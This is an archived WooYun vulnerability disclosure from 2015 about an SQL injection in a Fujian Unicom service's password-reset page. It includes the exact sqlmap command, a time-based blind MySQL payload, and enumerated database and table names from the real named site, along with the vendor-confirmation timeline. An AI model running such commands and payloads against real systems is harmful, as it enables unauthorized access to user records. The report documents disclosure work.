乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-05: 细节已通知厂商并且等待厂商处理中 2015-08-07: 厂商已经确认,细节仅向厂商公开 2015-08-17: 细节向核心白帽子及相关领域专家公开 2015-08-27: 细节向普通白帽子公开 2015-09-06: 细节向实习白帽子公开 2015-09-21: 细节向公众公开
福建联通某业务存在SQL注入漏洞,造成用户信息泄露。
在http://www.chinaunicom.com.cn/city/fujian/tscp/file23.html处,福建分区特色产品中看到url:WWW.10109123.COM/life
存在SQL注入漏洞:http://www.10109123.com/index.php/main/forgetpwd
sqlmap -u "http://www.10109123.com/index.php/main/forgetpwd" --data "submitbtn=%c8%b7%b6%a8&action=save&phone=-1" --random-agent --dbms=mysql -v 3 --batch
---Parameter: phone (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: submitbtn=%c8%b7%b6%a8&action=save&phone=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))eovg) AND 'ErQN'='ErQN Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---[22:50:11] [INFO] testing MySQL[22:50:11] [INFO] confirming MySQL[22:50:11] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.5, Apache 2.2.6back-end DBMS: MySQL >= 5.0.0
available databases [5]:[*] dianpiao[*] information_schemc[*] live[*] music[*] mysql
[44 tables]+-----------------------+| sms\?bbend00 || vac_dita\?89 || vac_dita\x07@\?d8\?0d || address_book || address_group || batch_info || black_list || code_sect || code_sect_bak || complain || contents || employee_info || fee || keywords || mms_file || mmscontent || mmsdeliver || mmssend || mmssend_his || month_fee || month_fee_history || notify || report_commi || report_user || sclink || single_order || smsdeliver || smsdeliverlog || smsreportlog || smssend00bak || smssend00log || smssend01 || smssend01log || statements || static_paies || subjects || sys_log || user_balance || user_info || user_info_history || user_order || v_smssend || v_useraorder || vac_dita |+-----------------------+
Database: live+-----------+---------+| Table | Entries |+-----------+---------+| user_info | 294384 |+-----------+---------+
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-08-07 15:14
CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置.
暂无